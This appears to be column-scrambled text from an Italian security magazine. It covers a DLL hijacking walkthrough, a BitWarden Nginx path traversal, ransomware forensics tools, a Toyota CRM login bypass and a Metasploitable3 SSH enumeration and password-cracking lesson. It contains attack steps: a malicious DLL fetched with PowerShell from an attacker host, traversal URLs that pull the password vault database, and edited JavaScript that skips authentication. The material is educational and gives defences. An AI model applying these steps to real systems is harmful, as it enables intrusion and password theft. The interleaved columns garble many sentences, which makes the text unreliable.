che protegge la tua privacy
di accesso

figura #13

PASSO 4: GHOST DLL ambiente PATH dell’utente la DLL malevola. Nel vostro caso, si
Adesso avete a posizionare la DLL Potete verificare quali sono le procede come segue. Sulla
malevola, all’interno della macchina variabili PATH tramite il comando macchina attaccante spostatevi nel
vittima. Quando un’applicazione $env:path [figura #12] folder dove avete creato la DLL
deve caricare una DLL, solitamente Quindi, se la DLL non viene trovata malevola e avviate con python un
utilizza un percorso assoluto. Se nei percorsi precedenti, verrà server HTTP:
non è specificato, utilizzerà un cercata in quelli all’interno delle python3 -m http.server 80
ordine di ricerca predefinito, nel variabili d’ambiente. La DLL, nel Dalla macchina vittima spostatevi
tentativo di trovare la DLL. vostro caso, viene cercata nella cartella C:\Tools\BgInfo\ ed
• La directory da cui viene caricata all’interno del path C:\Tools\BgInfo\ utilizzate PowerShell per fare il
l’applicazione e dato che abbiamo i permessi, downlaod del file:
• C:\Windows\System32 andremo ad allocare direttamente [figura #13]
• C:\Windows\System la DLL malevola al suddetto iwr -uri
• C:\Windows percorso. http:-/192.168.178.108/WINSTA.
• La directory di lavoro corrente dll -Outfile WINSTA.dll
• Directory nella variabile di PASSO 5: UPLOAD Adesso che la DLL malevola è stata
ambiente PATH di sistema E RESTART scaricata nella cartella C:\Tools\
• Directory nella variabile di Esistono diversi metodi per trasferire BgInfo\, potete utilizzare il servizio
che punta al file BgInfo64.exe.
Una volta che la DLL malevola è
Come difendersi? stata posizionata alla locazione
dove il programma la cercherebbe
Azioni e gli strumenti da utilizzare: sistema e infine nelle directory in fase di caricamento/avvio, è
1. Audit: PowerUp è un modulo in specificate nel percorso del sistema. necessario che il servizio (che gira
powershell utilizzato dagli attaccanti 3. Analisi preventiva: le soluzioni di
con i privilegi di amministratore)
per trovare possibili vie di escalation monitoraggio aiutano a identificare
all’interno dell’host, ma può essere l’esecuzione di software malevolo. venga riavviato. Ma l’utente non ha i
utilizzato anche da un BlueTeam per Queste soluzioni spesso fanno parte permessi per forzare il restart (del
rilevare tentativi di DLL Hijacking. delle suite di Endpoint Detection and servizio) da terminale, deve quindi
2. Restringere il caricamento delle Response (EDR), monitorano il riavviare la macchina per
librerie: è possibile configurare il comportamento delle applicazioni e
“triggerare” l’attacco (difatti come
sistema in modo da non consentire il possono impedire l’esecuzione di
hai visto nella parte 1 di
caricamento di DLL con una ricerca processi che mostrano segni di
estesa nelle directory e abilitare la attività sospetta, come il DLL Enumeration con il comando
modalità sicura di ricerca delle DLL. Hijacking. whoami /priv, l’utente ha il
permesso di Riavviare l’host).

15
ura #2

HACKTUALITÀ
A cura di
Luca Tringali

IL PORT AC HIA VI
IN BEL LA MO ST R A
Ngi nx pe r B it W arde n, il noto gestore
zione di
Un bug nella configura er di sfer ra re un at ta cco brute force
a un hack
di password, permette
location /attachments {
garantito a quel percorso. Nginx,

S
i chiama BitWarden ed è un
alias /etc/bitwarden/
gestore di password infatti, legge i percorsi che gli
attachments/;
sviluppato come vengono richiesti e cerca un match
}
applicazione Web. È open con le location che sono state
source ed è utilizzabile Apparentemente, questa sezione definite. Il problema è che il match
direttamente online sui server significa solo che contattando l’URI / può essere anche parziale. Per
ufficiali. Gratuito per uso privato, attachments si vedranno i file esempio, essendo quella location
prevede piani annuali per chi ha presenti nella cartella /etc/ definita senza lo slash finale queste
bisogno di un’autenticazione a due bitwarden/attachments/. due chiamate HTTP:
fattori o comunque per le aziende C’è però un problema legato a
che devono condividere password come funziona Nginx. C’è infatti una http://bitwarden/attachments/
tra più utenti. differenza nel definire la location prova.jpg
Visto che è open source, per una così: http://bitwarden/
maggiore sicurezza alcune aziende attachmentsprova.jpg
decidono spesso di ospitarne location /attachments {
un’installazione del server oppure in quest’altro modo: costituiscono entrambe un match
direttamente nella propria LAN. location /attachments/ { valido per la location, e finiscono col
Questo protegge da puntare allo stesso file (cioè /etc/
malintenzionati esterni all’azienda; Nel secondo caso, infatti, la bitwarden/attachments/prova.
il problema è che a volte il pericolo formulazione è corretta, la location jpg). Dove sarebbe il problema in
si nasconde proprio nella azienda dovrebbe sempre terminare con lo tutto questo? Si tratta solo di due
stessa: un dipendente malfidato, slash per indicare che l’accesso è modi diversi per ottenere lo stesso
oppure un malware scaricato per
sbaglio su qualche PC...
Il nuovo sistema di
Ora, il metodo più comune per
deploy “unified” di
installare BitWarden in una rete è
tramite il container Docker ufficiale
BitWarden è ancora
(bitwarden/self-host), ma questo, segnalato come beta
ovviamente, non contiene soltanto sul sito ufficiale, ma è
il codice dell’applicazione, ma comunque ormai
anche Nginx come web server. molto diffuso.

16
VULNERABILITÀ
file che comunque deve essere Con una semplice
pubblico a prescindere. Il problema chiamata http è
è che questo meccanismo può possibile scaricare
essere sfruttato per ottenere un l’interno database
path traversal, inserendo il percorso SQLite, per provare a
speciale .. in mezzo all’URL. I decifrare le password.
meccanismi implementati per FONTE: https://labs.
evitare che l’utente possa risalire hakaioffsec.com/
alla cartella superiore bloccano il nginx-alias-
doppio punto all’inizio di un traversal/
percorso, cioè la stringa “/../”.
Quindi se si scrivesse un URL tipo: scritta nel modo sbagliato. È la LA VULNERABILITÀ
mancanza dello slash che permette Per poter sfruttare questa
http://bitwarden/attachments//./ agli utenti di chiamare un percorso vulnerabilità bisogna avere accesso
prova.txt di questo tipo: a una istanza di BitDefender, ma
non è nemmeno necessario avere
Si otterrebbe un errore 403 http://bitwarden/attachments/./ delle credenziali. Ciò significa che
(Forbidden). Se invece si digita: vault.db esiste la possibilità che qualcuno,
dall’azienda stessa, possa
http://bitwarden/attachments/./ e ottenere il file con i “segreti” di recuperare il database delle
prova.txt Bitwarden. Il bug è quindi reso password e cercare di forzarlo con
pericoloso anche dal fatto che il calma. Ma non solo: è anche
non si ottiene alcun errore, perché database è memorizzato nella possibile che qualche malware
la stringa /attachments../ non è cartella superiore di quella con gli installato per sbaglio faccia una
proibita. Però poi Nginx traduce allegati. Il “trucco” del doppio punto scansione della rete alla ricerca di
comunque il percorso in: all’inizio della stringa può infatti questi database SQLite esposti.
essere usato una volta sola, quindi Certo, non è che un
/etc/bitwarden/attachments//./ se la cartella degli allegati fosse malintenzionato possa leggere le
prova.txt stata in un percorso del tipo: password dal database, sono
cifrate, però è molto più facile
Cioè in questo percorso esatto: /etc/bitwarden/web/attachments/ tentare il brute force avendo a
disposizione il database completo.
/etc/bitwarden/prova.txt non ci sarebbe alcun problema. E, La soluzione, implementata nel
invece, a causa della struttura delle giro di pochi giorni dalla sua
che è al di fuori della cartella root cartelle, si può vedere tutto ciò che scoperta, è stata la correzione della
definita nella configurazione, ma è contenuto in /etc/bitwarden. configurazione di Nginx. Va detto
a cui l’utente può accedere senza Infatti, allo stesso modo si possono che la versione “cloud” di
alcun problema. Questo non è un anche ottenere i log BitWarden, quella implementata
bug in Nginx, è il suo preciso dell’applicazione, che sono sui server ufficiali, non risultava
funzionamento: è la differenza tra conservati nella cartella: vulnerabile. Chi avesse installato
un percorso che termina con lo nella propria LAN una istanza
slash e uno che non termina con /etc/bitwarden/logs dockerizzata di BitWarden, a
lo slash. Ci sono infatti casi questo punto, deve solo assicurarsi
particolari in cui questa Per esempio, chiamando un URL di di avere l’ultima immagine del
distinzione può essere utile per la questo tipo: container. O può entrare nel
configurazione. Il problema è che container e modificare il file di
in questo caso, nel container di http://bitwarden/attachments/./ configurazione di Nginx
Bitwarden, la configurazione è logs/notifications.log aggiungendo lo slash mancante.

17
ura #2

HACKTUALITÀ

RA NSOM W A RE
FORENS IC S: C OS ’È
E COME F UN Z IO NA
e co ns en te di ra ccog liere le prove
o ch
È l’analisi di un attacc
pi re co m e si è ve ri fi cata la violazione
digitali per meglio ca
st em i in fo rm at ic i. M a quando si usa?
dei si

i ransomware e del loro ANALIZZARE L’ATTACCO L’indagine digitale si può

D dilagare con attacchi in


netto aumento negli ultimi
anni, ne abbiamo parlato
spesso su queste pagine. I
ransomware rappresentano oggi la
Vittime dell’attacco, forze dell’ordine
o compagnie di assicurazioni, in
seguito a un attacco ransomware
possono ricorrere a quella che in
gergo è conosciuta come
sostanzialmente riassumere in due
fasi: raccolta e analisi delle prove,
interpretazione e reporting
dell’indagine. Nella prima fase gli
investigatori digitali catalogano tutte
principale minaccia per la sicurezza Ramsomware Forensic, un processo le prove in loro possesso (log di
informatica, soprattutto nel Bel d’indagine complesso e sistema, registro degli eventi, flussi
Paese; lo scorso anno sono stati impegnativo, ma che può rivelarsi di rete ecc.), poi si procede con la
ben 188 gli attacchi documentati, in davvero utile per le vittime di un ricerca di informazioni utili per
crescita del 169% rispetto all’anno attacco e per le forze dell’ordine. determinare il punto debole
precedente, con un preoccupante
7,6% degli attacchi andati a buon
fine, contro il 3,4% del 2021. Sono
questi i dati inquietanti divulgati per
l’anno 2023 dal rapporto redatto
dall’Associazione Italiana per la
Sicurezza Informatica (CLUSIT),
fondata nell’anno 2000 presso il
Dipartimento di Informatica
dell’Università degli Studi di Milano.
In seguito a un attacco da
ransomware, gli esperti del settore
si ritrovano spesso a dover
affrontare una vera e propria
indagine forense in grado di
analizzare l’intero processo al fine di
individuarne i dati compromessi, Dal Rapporto CLUSIT 2023 si evince che il 37% degli attacchi globali
quelli trafugati e possibilmente gli sfruttano ii malware, seguono lo sfruttamento delle vulnerabilità
autori materiali dell’attacco. (12%), phishing e social engineering (12%) e attacchi di tipo DDoS (4%).

18
RANSOMWARE FORENSICS
Ransomware: in Italia numeri da capogiro!
I l nostro Paese è il terzo al mondo e il primo in Europa a
essere maggiormente colpito dai malware, è questo il
quadro preoccupante che emerge dall’ultimo rapporto
Anche l’AI ha contribuito
all’ascesa degli attacchi
“Stepping ahead of risk” divulgato da Trend Micro Research. ransomware. Nuovi tool
In aggiunta, secondo il report “Threatland” - redatto dal come WormGpt e
Security Operation Center e dal team di Cyber Threat
Intelligence di Swascan - nel secondo trimestre di
FraudGpt, “gemelli cattivi”
quest’anno, rispetto ai primi tre mesi, gli attacchi in Italia di ChatGpt, hanno
sono aumentati del 34,6% (+62% a livello globale), con un permesso ai
numero di aziende colpite sempre più importante (+185% cybercriminali di creare
dall’inizio dell’anno e +105% rispetto al secondo trimestre
dello scorso anno). attacchi più complessi.

utilizzato per sferrare l’attacco, le seguito alcuni degli strumenti reale o da dati “catturati” in
attività eseguite dal malware, i dati maggiormente utilizzati, da soli o in precedenza. Wireshark è in grado di
trafugati e/o criptati, le eventuali combinazione. decodificare e visualizzare pacchetti
tracce che possono far risalire di dati in base a una vasta gamma
all’autore dell’attacco. VOLATILITY: un framework open di protocolli di rete, tra cui HTTP,
L’interpretazione delle prove source scritto in Python, disponibile TCP, UDP, IP, DNS, SSL/TLS ecc.,
consentirà quindi agli esperti di per Windows, Linux e macOS, utile consentendo agli investigatori di
ricostruire l’intera sequenza degli per l’analisi della memoria forense e esaminare in dettaglio come i dati
eventi dell’attacco; a quest’ultima utile per ricostruire eventi avvenuti vengono scambiati tra i vari
fase seguirà lo step finale, ovvero la sulla macchina oggetto dell’attacco. dispositivi di rete.
presentazione dei risultati Il framework consente di estrarre Sito Internet: https://www.
dell’indagine alle parti interessate. informazioni da processi e thread in wireshark.org/
esecuzione, DLL caricate, registri
GLI STRUMENTI interessati ecc. CAPEV2: una potente sandbox
E LE TECNICHE Sito Internet: https://www. forense open source. Permette di
Ma quali sono gli strumenti che gli volatilityfoundation.org/ eseguire o controllare file sospetti
investigatori forensi digitali usano in un ambiente controllato e isolato.
per compiere il lavoro investigativo FTK IMAGER: uno strumento Il tool consente anche di recuperare
in seguito a un attacco impiegato per eseguire una copia tracce di chiamate API win32
ransomware? Tra i vari tool forense di ogni supporto digitale. eseguite da tutti i processi generati
spiccano quelli in grado di Consente, inoltre, di eseguire la dal malware, così come i file creati,
analizzare i file criptati dal malware copia della memoria RAM e eliminati e scaricati da quest’ultimo.
tentandone il ripristino, i software visualizzare in anteprima file e Sito Internet: https://github.com/
utilizzati per analizzare i file di log e i cartelle su dischi locali, unità di rete, kevoreilly/CAPEv2
file di sistema per identificare le o qualunque altra unità flash.
informazioni utili all’indagine e Sito Internet: https://www.exterro. AUTOPSY: Permette l’analisi di
quelli impiegati per analizzare il com/ftk-imager partizioni o immagini del disco. In
codice del malware al fine di seguito a un attacco il tool permette
carpirne funzionalità e origini. WIRESHARK: un potente di analizzare i dispositivi di
La scelta dello strumento più adatto analizzatore di pacchetti di rete archiviazione, recuperare file di ogni
dipende da una serie di fattori, tra open source. Permette di catturare genere e cercare manipolazioni del
cui il tipo di ransomware coinvolto, il traffico di rete proveniente da sistema all’interno del filesystem.
le risorse disponibili e le diverse interfacce, consentendo Sito Internet: https://www.autopsy.
competenze dell’analista forense. Di l’analisi del flusso di dati in tempo com/

19
HACKTUALITÀ

PORTE AP ER TE A cura di
Luca Tringali

ALLA TO YO TA ! di Toyota Messico,


li co m m erci al i
bug che permetteva
responsa bi
Un servizio dedicato ai fiche , na sc onde va un
agra
per la gestione delle an e. Svelati i retroscena!
e l’autenti cazi on
di bypassar

S
e forniamo i nostri dati di correlare la cosa a qualche sui prodotti acquistati, i periodi di
a un social network servizio online dall’origine dubbia. garanzia, gli accessori richiesti
o a un qualche sito web, Quello che è forse meno chiaro è eccetera. Il fatto è che i
tendiamo (si spera) a che i nostri dati sono anche nelle responsabili commerciali hanno
chiederci che fine faranno quei mani di aziende più “tradizionali”, poi bisogno di queste
dati. E del resto se l’introduzione che non svolgono la propria informazioni, e spesso la soluzione
del GDPR è servita a qualcosa in attività sul Web ma che li usano migliore per facilitare loro
Europa, è proprio a rendere per scopi interni. Nelle grandi l’accesso è fornire una interfaccia
palese a tutti che molti servizi aziende, infatti, uno degli asset più web. Queste maschere sono
web utilizzano i nostri dati. Certo, preziosi è il registro dei clienti: ovviamente protette da una
poi non è servita a molto altro tutte le aziende cercano di autenticazione, ma in linea di
perché la gente clicca comunque tracciare quanto più possibile un massima sono siti web come tutti
su “Accetto” senza nemmeno profilo dei propri clienti, in modo gli altri, e quindi potenzialmente
leggere l’informativa della privacy. da poter proporre loro nuovi vulnerabili ad attacchi di vario
E quindi se un bel giorno prodotti e in generale evitare che genere. L’esempio che facciamo è
qualcuno trova i suoi dati si rivolgano alla concorrenza. Il il recente caso di authentication
pubblicati da qualche parte, o profilo ha, come minimo, una bypass su Toyota C360,
qualche pubblicità un po’ troppo anagrafica, ma a seconda dei casi l’interfaccia web utilizzata dalla
personalizzata, è almeno in grado può includere anche informazioni famosa casa automobilistica.

GLOSSARIO
DI BASE
FRONTEND-BACKEND applicazioni web di una stessa azienda. Se gestito
Molte applicazioni web sono realizzate secondo la correttamente può essere una soluzione più sicura e
filosofia Frontend-Backend, in cui il fronted è efficiente, proprio perché c’è un unico punto di gestione
sostanzialmente “ignorante”, non accede al database e degli account.
non fa alcuna reale operazione. Si occupa solo di fare
chiamate http alle API fornite da un backend, il quale ROTTE
svolge effettivamente le varie operazioni chieste Le rotte http sono semplicemente gli URL relativi di una
dall’utente. applicazione. Per esempio, in facebook.com/messages,
la rotta per la messaggistica è /messages.
SSO Le applicazioni Angular utilizzano i “router” per gestire
Un Single Sign On è semplicemente un servizio le rotte e stabilire quale funzione debba rispondere
centralizzato che offre delle API per il login di diverse a un URL.

20
VULNERABILITÀ
Entrati nel CRM,
è possibile cercare un
cliente semplicemente
conoscendo il suo nome
e cognome.
FONTE: https://eaton-
works.com/2023/03/06/
toyota-c360-hack/

IL MOMENTO ANGOLARE Questo ci fa capire, per esempio, Questo significa che, più o meno
Il CRM di Toyota in questione era che l’ambiente di staging si trova facilmente a seconda delle
raggiungibile all’url https://c360. su dev.customercentral.toyota. implementazioni, l’utente può
customercentral.toyota.com/, ed è com, che una volta c’era anche la modificare il codice stesso. In
una applicazione realizzata in gestione degli utenti degli Stati questo caso, gli esperti di sicurezza
Angular. Questo significa che Uniti (che probabilmente adesso informatica hanno scoperto che
l’applicazione viene eseguita saranno su un altro CRM), e che bastava commentare un paio di
interamente nel browser l’autenticazione avviene tramite il funzioni per evitare il redirect sulla
dell’utente, ovviamente con single sign on di Microsoft. Il sito pagina di login di Microsoft in
chiamate alle API del backend. di produzione, quando era attivo, main.js:
Ed è una single page application, restituiva un codice 403,
quindi tutto sommato abbastanza login(){
Unauthorized, senza alcun punto
facile da analizzare. Controllando il // this.msalService.loginPopup().
di accesso. Probabilmente era
codice sorgente, si vedono alcune subscribe(
necessario accedere con qualche
variabili d’ambiente con i vari URL: // (response:
token fornito da un’altra pagina di
AuthenticationResult) /> {
login ignota (magari un sito
const environment = { // console.info({ response:
aziendale). Apparentemente,
production: false, response });
quindi, senza alcuna possibilità di
apiBaseURL: ‘https: //dev. // this.msalService.instance.
entrare.
customercentral.toyota.com’, setActiveAccount(response.
L’ambiente di staging, invece,
envName: ‘dev’, account);
propone una pagina di login del
applicationURL: ‘https: //c360. // },
Single Sign On di Microsoft, con le
dev.customercentral.toyota.com’, // (err) /> {
credenziali aziendali di Toyota
/* // console.error({err:err});
(che evidentemente utilizza i
US legacy application // }
servizi di Office365).
/* // );
Naturalmente, il single sign on di
// azureClientId: ‘49465297-34e9- // this.msalService.loginRedirect();
Azure è molto affidabile, non si
41b5-b44b-aS3703786574’, }
può certo forzare se non si
// authority: ‘https: //login. e restituire, al posto del
conosce la password di un utente.
microsoftonline.com/tmnatest. risultato del login, un oggetto
Però bisogna vedere come è stato
onmicrosoft.com’ JSON vuoto in vendor.js:
gestito il processo di
/* ClientApplication.prototype.
autenticazione. E, nel caso del
Mexico application getActiveAccount = function () {
CRM C360, l’autenticazione viene
// //return this.browserStorage.
gestita direttamente dal frontend
azureClientId: ‘beSal6ef-b40f- getActiveAccount();
Angular. Questo è un problema,
4cc7-9c1e-476b30579d32”, return {};
perché per la natura stessa di
authority: ‘https: //login. };
Angular il codice viene scaricato
microsoftonline.com/tmnatest. nel browser dell’utente ed
onmicrosoft.com’ eseguito direttamente lì. L’applicazione, a quel punto, ritiene

21
HACKTUALITÀ
Per ogni cliente paese, equivalenti al 20% circa del
censito è possibile mercato (https://www.best
vedere la lista di -selling-cars.com/brands/2021
veicoli acquistati, -full-year-global-toyota-worldwide
riparazioni -car-sales-production-and-exports/).
effettuate, indirizzo, E il CRM C360 contiene dati non
telefono ed email. solo dei nuovi clienti ma anche di
FONTE: https:// quelli passati, incluse le varie
eaton-works. riparazioni richieste nelle officine.
com/2023/03/06/ Ci sono tutti i vari dati anagrafici e
toyota-c360-hack/ di contatto, incluso l’indirizzo di
casa, il telefono e l’email.

che il login sia avvenuto senza staging, e risulteranno provenire LA SOLUZIONE


errori, e presenta quindi la da una istanza dell’applicazione La strada scelta da Toyota, per
dashboard dell’applicazione CRM. correttamente autenticata. proteggere i dati dei clienti,
Questo rende bypassabile L’altro errore grave è che le API consiste nell’oscurare l’intera
l’autenticazione del Single Sign non controllano la provenienza applicazione, evidentemente
On. Naturalmente, si ottiene delle richieste, quindi il backend di decidendo di farne a meno, o
l’accesso all’ambiente di staging, produzione risponde senza magari proteggendola con una
che contiene dati fasulli. Ma è problemi a richieste provenienti VPN. Una cosa che avrebbe senso,
possibile accedere anche ai dati da una istanza frontend di infatti, è tenere questi servizi
di produzione, con informazioni staging. La cosa poteva anche dentro una VPN, ma la poca abilità
su veri clienti di Toyota? funzionare, pur essendo rischiosa, informatica dei dipendenti spesso
Alla fine, l’applicazione è sempre la se nessuno fosse riuscito a trovare rende difficile implementare
stessa, e l’autenticazione risulta l’URL di produzione. Ma, visto che regole di accesso troppo
già completata con successo, lo hanno inserito nella stringenti. A livello di codice,
basterebbe avere l’endpoint delle configurazione ed è quindi visibile invece, in Angular è possibile
API di produzione invece di quello nel sorgente dell’app di staging, utilizzare l’interfaccia canActivate
di staging per fare richieste verso il non c’è alcun reale livello di (https://angular.io/api/router/
server collegato al database con sicurezza. In altre parole, la CanActivateFn) per far sapere a un
dati reali. In teoria l’URL combinazione del bypass router quali rotte possono essere
dell’endpoint di produzione dell’autenticazione su staging e la chiamate e in quali condizioni,
dovrebbe essere segreto, e di possibilità di leggere e sostituire magari dietro un sistema di token
sicuro l’applicazione di staging non “impunemente” l’endpoint di temporanei per evitare che
ha alcun bisogno di memorizzarlo produzione permette un accesso qualcuno possa fare chiamate API
da qualche parte. E, invece, non autenticato al db di soltanto conoscendo l’URL. Una
scorrendo i file del sorgente si produzione. buona norma, in generale, è
trova un file di configurazione che trattare il codice lato client come
contiene tutti gli endpoint, anche LA VULNERABILITÀ insicuro. Le chiamate alle API
quelli non utilizzati. Trovato l’URL La vulnerabilità ha colpito, in devono sempre essere
di produzione, è molto facile questo caso, i clienti di Toyota in adeguatamente protette di per sé,
sostituirlo al volo nella Messico. Che sono parecchie senza fare affidamento sul codice
configurazione degli endpoint da persone: solo nel 2021, ultimo client, e l’autenticazione dovrebbe
usare: da quel momento le anno per cui al momento abbiamo essere gestita da un backend, in
chiamate alle API verranno delle statistiche, Toyota e i brand modo da non dare all’utente il
indirizzate verso l’URL di del suo gruppo hanno venduto controllo sullo stato della
produzione invece di quello di oltre 90 mila veicoli in questo procedura di login.

22
S I C U R E Z Z A
METASPLOITABLE3 E ora... il cracking delle password
Continua il corso su come aumentare le competenze da pentester �������������������������������� 24

STEGANOGRAFIA Il messaggio si cela tra i pixel


Come nascondere testi e foto in un video ����������������������������������������������������������������������������������������� 32

CYBERGUERRA Phishing e defacing


Tecniche e strategie di protezione utilizzate
nel conflitto Russia-Ucraina ������������������������������������������������������������������������������������������������������������������������� 38

MALWARE Smartphone a prova di spia


App 100% legali potrebbero nascondere delle insidie.
Le dritte per sgamarle ������������������������������������������������������������������������������������������������������������������������������������� 42

23
SICUREZZA

PARTE SETTIMA

E ORA...
IL CRACKING
DELL E P ASSWORD
co m e au m en ta re le competenze
o su
Continua il nostro cors ero ut ili zz eremo alcune wordlist
a dizionario”
to nu m
da pentester: in ques de no m in at o “a tt ac co
che è
per effettuare quello

l nostro pentest della VM ambienti Unix/Linux. exploit-db.com), o meglio della

I Metasploitable3 – la
macchina virtuale
“vulnerabile by design”
sviluppata da Rapid7 come
ambiente addestrativo per le
In questo modo, siamo riusciti
a identificare la versione del
servizio SSH disponibile sulla
porta 22 di Metasploitable
(OpenSSH 7.1): una versione
sua interfaccia a riga di
comando presente
nativamente in Kali Linux,
searchsploit
[figura #2]. Il problema di
verifiche di sicurezza e l’utilizzo che, sebbene piuttosto datata, sicurezza più rilevante che
dei propri tool (Metasploit in non è risultata affetta da abbiamo individuato consiste
primis) – sta iniziando a dare i vulnerabilità di gravità elevata, nella vulnerabilità CVE-2018-
primi frutti. Nelle scorse come testimoniato dal risultato 15473 [figura #3] di tipo “user
puntate, dopo il tuning iniziale (decisamente al di sotto delle enumeration”, grazie alla quale
dell’ambiente virtuale che aspettative) delle indagini è possibile stabilire se un
utilizziamo per il penetration effettuate avvalendoci di determinato nome utente sia
test [figura #1], ci siamo ExploitDB (il noto database definito o meno sul sistema
dedicati a un’iniziale fase di pubblico di vulnerabilità, locale attraverso un banale
scansione, volta a individuare i consultabile al link https:// tentativo di login.
servizi in esecuzione sul
sistema target. Al
completamento di questa
figura #1
attività, abbiamo focalizzato la
nostra attenzione su un
servizio in particolare, SSH,
attirati dall’inconsueta
associazione tra un sistema
Windows e un servizio Un penetration test che si rispetti non può prescindere
generalmente associato ad dalla realizzazione, prima di iniziare, di una mappa della rete target.

24
METASPLOITABLE3
figura #2 figura #3

La CVE più rilevante che abbiamo individuato


per la versione di OpenSSH in uso su
Searchsploit non è particolarmente prodigo di risultati Metasploitable consente l’enumerazione
per la versione di OpenSSH in uso su Metasploitable. degli utenti locali, ma niente di più.

STEALTH O EFFICACE? al tool che sfrutta la CVE-2018- sfruttamento della vulnerabilità


A tal riguardo è bene 15473 una wordlist corposa di comporta molteplici tentativi di
aggiungere un tassello, che potenziali nomi utente da login per utenti non definiti sul
nelle scorse puntate abbiamo utilizzare per i tentativi di login), sistema, per ciascuno dei quali
volutamente tralasciato per già di per sé generalmente viene di norma aggiunto un
soffermarci sugli aspetti contingentato durante una record ai log di OpenSSH. In
tecnico-pratici dell’attacco: far verifica di sicurezza (che altri termini, sebbene – come
ricorso a questa vulnerabilità ha generalmente deve essere visto – la vulnerabilità si presti
il suo prezzo! Oltre al fattore completata entro un tempo perfettamente
tempo (in quanto, come massimo concordato con il all’enumerazione degli utenti
abbiamo già avuto modo di committente e/o attenendosi a locali del sistema target, il suo
vedere, è necessario sottoporre orari ben precisi), lo utilizzo dovrebbe essere

Scopriamo la VM
sicurezza della rete testata, ne marcano / segnalano la
M etasploitable3 è pensata per un uso addestrativo, al
fine di consentire ai penetration tester in erba di
migliorare le proprie skill. A tal riguardo, costituisce un
presenza nel report finale);
• L’impiego di tecniche aggiuntive (come l’offuscamento,
importante upgrade rispetto alla sorella maggiore l’utilizzo di contenuti embedded nei file, attributi dei file
(Metasploitable2, a cui abbiamo dedicato tante puntate particolari o permessi d’accesso particolarmente
della nostra serie), introducendo novità di rilievo come: stringenti) a protezione delle flag, per rendere più
• Il ricorso a Windows, che consente di ampliare la nostra realistico l’accesso alle carte, simulando quanto avviene
esperienza (sin qui formatasi esclusivamente in ambiente nel mondo reale (in cui le informazioni più importanti sono
GNU/Linux, essendo Metasploitable2 una VM basata su generalmente protette da misure di sicurezza aggiuntive);
una distro Linux) alla trattazione di vulnerabilità e di • L’uso di un approccio di tipo gamification, in cui – al
problematiche di sicurezza peculiari di quello che è uno pari di quanto avviene in molte piattaforme (soprattutto
dei sistemi operativi più diffusi in ambito desktop e server; on line) per aspiranti pentester – la VM ci offre la possibilità
• L’utilizzo dei flag, appositi file utilizzati nei contest CTF di sfidare noi stessi (e magari gli amici) nella ricerca del
(acronimo, per l’appunto, di Capture the Flag) per “mazzo di carte” nascosto al suo interno, che costituisce il
simboleggiare quegli asset aziendali obiettivo tanto degli formato specifico con cui gli sviluppatori di
attaccanti che dei penetration tester (i quali, a Metasploitable3 hanno voluto rappresentare le flag da
dimostrazione del lavoro svolto e dell’eventuale esistenza catturare (mettendoci letteralmente la faccia, giacché ogni
di una o più vulnerabilità in grado di compromettere la carta è dedicata a uno di loro).

25
SICUREZZA
figura #4 questo modo, ci siamo garantiti
la persistenza dei nomi utenti
“scoperti” anche a fronte della
chiusura del framework: dopo
aver avviato nuovamente, con il
comando:

Il modulo ssh_enumusers al lavoro: grazie alla wordlist selezionata # msfconsole

è possibile individuare ben 5 utenti locali, ma niente vi vieta


di estendere il tentativo di enumerazione a ulteriori dizionari, e aver caricato la workspace
per scoprire se questo risultato sia migliorabile. creata la scorsa puntata:

preventivamente valutato dal UTENTI ENUMERATI msf6> workspace metasploitable3


pentester, sulla base delle Chiarito questo aspetto – non
caratteristiche della specifica meno importante, possiamo disporre la
verifica di sicurezza che sta nell’economia di una verifica di visualizzazione delle credenziali
conducendo in quel momento. sicurezza, del problema tecnico salvate (che per ora si limitano
Un esempio? Se si è impegnati vero e proprio – possiamo al solo username) utilizzando il
in un penetration test “black tornare all’attacco condotto comando [figura #5]:
box”, ovvero senza che il ai danni del servizio SSH e,
personale dell’organizzazione soprattutto, ai suoi frutti. Grazie msf6> creds
interessata dal test – tranne a Metasploit (il celeberrimo
pochi, selezionati membri del framework per il penetration CHI CERCA, TROVA!
management, se non l’unico test, di cui riportiamo nel box Il passo successivo
che ha commissionato omonimo le caratteristiche all’enumerazione degli utenti è,
l’attività e rilasciato la relativa salienti e le istruzioni di chiaramente, quello di cercare
manleva – ne sia a configurazione), e al suo di ottenerne la relativa
conoscenza, i log in questione modulo ssh enumusers, siamo password. Esistono diverse
potrebbero mettere all’erta il stati in grado di individuare un tecniche che possiamo utilizzare
comparto IT/ il SOC interno, o certo numero di utenti locali per lo scopo; in questa sede,
peggio essere scambiati per definiti in Metasploitable3 tuttavia, ci limiteremo a provare
un’attività malevola in corso, [figura #4], inseriti quella più elementare, il
provocando l’attivazione delle automaticamente all’interno cracking. Utilizzeremo cioè
conseguenti contromisure, della workspace alcune delle wordlist presenti in
in grado potenzialmente di “metasploitable3” del database Kali per effettuare quello che
impedire la prosecuzione interno di Metasploit all’esito formalmente è denominato
del test. dell’esecuzione del modulo. In “attacco a dizionario”.

figura #5 Mediante ricorso a un tool


apposito proveremo, per
ciascun utente, a effettuare il
login al servizio SSH utilizzando
tutte le password contenute
all’interno della wordlist scelta:
se uno di questi tentativi di
Con il comando “creds”, possiamo visualizzare gli account sin qui login dovesse andare a buon
individuati nel corso della verifica di sicurezza... a patto, fine, avremmo scoperto una
naturalmente, di aver configurato correttamente il database interno coppia di credenziali valide. Si
di Metasploit e aver selezionato la corretta workspace! tratta di un attacco che – in

26
DASDASDSDASDASDASD
METASPLOITABLE3
figura #6 figura #7

Hydra è un tool molto potente e versatile, Dalla shell di Metasploit è possibile invocare “awk”
come si può notare dalle tantissime opzioni e “cat”, che ci consentono di manipolare i file di
di configurazioni, che il manuale ci illustra testo eventualmente prodotti e/o esfiltrati durante
con dovizia di particolari. la nostra verifica di sicurezza.
ambienti privi di una password completata – un certo effort in I TOOL
policy sufficientemente termini di tempi d’esecuzione Se riteniamo congruo il
robusta – può portare a e un non trascurabile rischio di rapporto costo/benefici di
risultati senz’altro rilevamento, vista la presenza questa attività, allora possiamo
soddisfacenti, sebbene di ripetuti tentativi di login in inserirla nella nostra verifica di
comporti – come nel caso un breve periodo per il sicurezza, a patto di individuare
dell’enumerazione appena medesimo username. quale sia il tool da utilizzare per

Scaricare e installare le VM per seguire la guida


Per seguire i nostri tutorial è necessario disporre di: aver assegnato un nome non necessariamente intuitivo,
• Una macchina virtuale Metasploitable3 (il sistema oggetto obbligandoci ad assicurarci il corretto riconoscimento
di test); mediante il nome del dispositivo di archiviazione in uso, dal
• Una macchina virtuale Kali Linux (la console del pentester). nome inequivocabile di metasploitable3-win2k8-disk001.
